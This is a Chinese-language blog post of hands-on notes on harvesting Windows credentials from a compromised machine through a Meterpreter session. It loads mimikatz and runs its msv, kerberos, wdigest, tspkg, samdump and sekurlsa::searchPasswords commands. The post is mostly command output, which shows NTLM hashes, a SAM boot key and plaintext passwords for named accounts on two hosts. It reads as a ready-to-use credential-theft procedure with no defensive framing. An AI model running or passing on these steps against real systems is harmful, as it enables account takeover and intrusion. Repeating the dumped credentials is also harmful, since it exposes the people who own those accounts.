meterpreter读取hash明文记录
今天测试某个站点时读hash老出错 这里做下读hash的笔记
进去meterpreter后getuid一
|
1
2
|
meterpreter > getuidServer username: NT AUTHORITY\SYSTEM |
加载mimikatz模块
|
1
2
|
meterpreter > load mimikatzLoading extension mimikatz...Success. |
加载成功.
获取登录密码的hash值
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > msv[+] Running as SYSTEM[*] Retrieving msv credentialsmsv credentials===============AuthID Package Domain User Password------ ------- ------ ---- --------0;334101 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;334068 NTLM chenglee-PC chenglee lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)0;996 Negotiate WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO)0;49101 NTLM n.s. (Credentials KO)0;999 NTLM WORKGROUP CHENGLEE-PC$ n.s. (Credentials KO) |
上面已经是得到hash值了. 下面算明文密码.
获取明文密码
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
拿到登录的明文密码了.
不过也有一些特殊的情况, 例如这样
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > kerberos[+] Running as SYSTEM[*] Retrieving kerberos credentialskerberos credentials====================AuthID Package Domain User Password------ ------- ------ ---- --------0;10408969 NTLM CLOUDVM Administrator0;266228 NTLM CLOUDVM Administrator0;997 Negotiate NT AUTHORITY LOCAL SERVICE0;996 Negotiate WORKGROUP CLOUDVM$0;23595 NTLM0;999 NTLM WORKGROUP CLOUDVM$ |
哈希值也获取不到,
使用另一种方式获取哈希值
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
meterpreter > mimikatz_command -f samdump::hashesOrdinateur : chenglee-PCBootKey : 0648ced51b6060bed1a3654e0ee0fd93Rid : 500User : AdministratorLM :NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0Rid : 501User : GuestLM :NTLM :Rid : 1000User : chengleeLM :NTLM : 8d0f8e1a18236379538411a9056799f5 |
ok, 获取到了,
根据上面的方式获取明文密码
|
1
2
3
4
5
6
7
8
|
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { chenglee ; chenglee-PC ; lizhenghua }[1] { chenglee ; chenglee-PC ; lizhenghua }[2] { chenglee ; chenglee-PC ; lizhenghua }[3] { chenglee ; chenglee-PC ; lizhenghua }[4] { chenglee-PC ; chenglee ; lizhenghua }[5] { chenglee-PC ; chenglee ; lizhenghua }meterpreter > |
2
|
1
2
3
|
meterpreter > mimikatz_command -f sekurlsa::searchPasswords[0] { Administrator ; CLOUDVM ; 1244567 }[1] { Administrator ; CLOUDVM ; 1244567 } |
都拿到了
另外提一下更简洁的方式,就是 wdigest命令了,
这个命令呢, 没有上面的复杂,加载模块后直接调用这个wdigest.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > wdigest[+] Running as SYSTEM[*] Retrieving wdigest credentialswdigest credentials===================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
还有一个跟wdigest一样的就是tspkg啦
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
meterpreter > tspkg[+] Running as SYSTEM[*] Retrieving tspkg credentialstspkg credentials=================AuthID Package Domain User Password------ ------- ------ ---- --------0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP CHENGLEE-PC$ 0;49101 NTLM 0;999 NTLM WORKGROUP CHENGLEE-PC$ 0;334101 NTLM chenglee-PC chenglee lizhenghua0;334068 NTLM chenglee-PC chenglee lizhenghua |
meterpreter读取hash明文记录的更多相关文章
- Access,MSSQL:随机读取N条记录
今天试着将一个网站使用的mssql转换为Access,但网站首页有一段代码是随机读取n条记录: SQL Server:Select TOP N * From TABLE Order By NewID( ...
- 用C读取系统明文(附源码)
从一好朋友那得到一个好东西 可以读取系统明文 请用vc++ 6.0编译 #include <windows.h> #include <stdio.h> // // Vsbat[ ...
- PHP 读取逐条数据库记录,以及提交下拉菜单选项
<?php $db_host=localhost; //MYSQL服务器名$db_user=root; //MYSQL用户名$db_pass="******"; //MYSQ ...
- 玩下软工项目,第一轮--全局Context的获取,SQLite的建立与增删改查,读取用户通话记录信息
项目的Github地址:https://github.com/ggrcwxh/LastTime 采用基于git的多人协作开发模式 软件采用mvc设计模式,前端这么艺术的事我不太懂,交给斌豪同学去头疼了 ...
- Snort里如何将读取的包记录存到指定的目录下(图文详解)
不多说,直接上干货! 比如,在/root/log目录下. [root@datatest ~]# snort -dve -l /root/log 需要注意: 1) /log目录需要你自己建立,并修改权限 ...
- CKPlayer从Cookie里读取上次播放记录的一个demo
<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content=& ...
- 读取Excel的记录并导入SQL数据库
准备一下,近段时间,需要把Excel的数据导入数据库中. 引用命名空间: using System.Configuration; using System.Data; using System.Dat ...
- Snort里如何将读取的包记录存到二进制tcpdump文件下(图文详解)
不多说,直接上干货! 如果网络速度很快,或者想使日志更加紧凑以便以后的分析,那么应该使用二进制的日志文件格式.如tcpdump格式或者pcap格式. 这里,我们不需指定本地网络了,因为所以的东西都被 ...
- 现有有N个学生的数据记录,每个记录包括学号、姓名、三科成绩。 编写一个函数input,用来输入一个学生的数据记录。 编写一个函数print,打印一个学生的数据记录。 在主函数调用这两个函数,读取N条记录输入,再按要求输出。 N<100
#include <iostream> using namespace std; struct student {char num[100]; char name[100]; int ...
随机推荐
- kafka对消费者分配分区规则(Java源码)
在上一篇 kafka topic消息分配partition规则(Java源码) 我们对生产者产生的消息分配partition规则进行了分析,那么本章我们来看看消费者是怎么样分配partition的. ...
- Net基础篇_学习笔记_第九天_数组_三个练习
练习一: using System; using System.Collections.Generic; using System.Linq; using System.Text; using Sys ...
- helm在kubernetes环境中搭建
1.安装helm 1.1.安装helm客户端 各个版本的helm:https://github.com/helm/helm/releases wget https://get.helm.sh/helm ...
- 作为IT面试官,我如何考核计算机专业毕业生?作为培训班老师,我又如何提升他们?
我最近几年一直在做技术面试官,除了面试有一定工作经验的社会人员外,有时还会面试在校实习生和刚毕业的大学生.同时,我也在学校里做过兼职讲师,上些政府补贴课程(这些课程有补贴,学生不用出钱),所以我会在不 ...
- 第一次参与国际空间站ISS 的SSTV活动
先来看看本次 ISS 的 SSTV活动公告 SSTV Event planned for Early August ARISS News Release ...
- TLC5615
#include <reg51.h> #include "TLC5615.c" code uchar seven_seg[] = {0xc0, 0xf9, 0xa4, ...
- Linux环境下MySQL的安装、密码策略、忘记密码后的破解及用户授权等。
mysql安装.用户密码.密码策略.授权用户等(mysql5.7版本) 1.mysql安装后相关目录与文件: 主配置文件: /etc/my.cnf 数据库目录: /var/lib/mysql/ 默认端 ...
- JavaScript之操作符
计算机被发明的初衷仅仅是为了快速实现一些数学计算,然而经过多年发展,计算机已经不单单能实现快速计算这么简单的工作了,现代计算机不仅能够进行数值的计算,还能进行逻辑计算,还具备存储记忆功能,是能够按照程 ...
- java数据结构——递归(Recursion)例题持续更新中
继续学习数据结构递归,什么是递归呢?字面理解就是先递出去,然后回归,递归核心思想就是直接或间接调用本身,好比从前有座山,山里有位老和尚,在给小和尚讲故事,讲的是从前有座山,山里有位老和尚,在给小和尚讲 ...
- postgresql从库搭建
1 复制类型 PostgreSQL支持物理复制(流复制)及逻辑复制2种.通过流复制技术,可以从实例级复制出一个与主库一模一样的实例级的从库.流复制同步方式有同步.异步两种. 另一种复制方式为逻辑复制, ...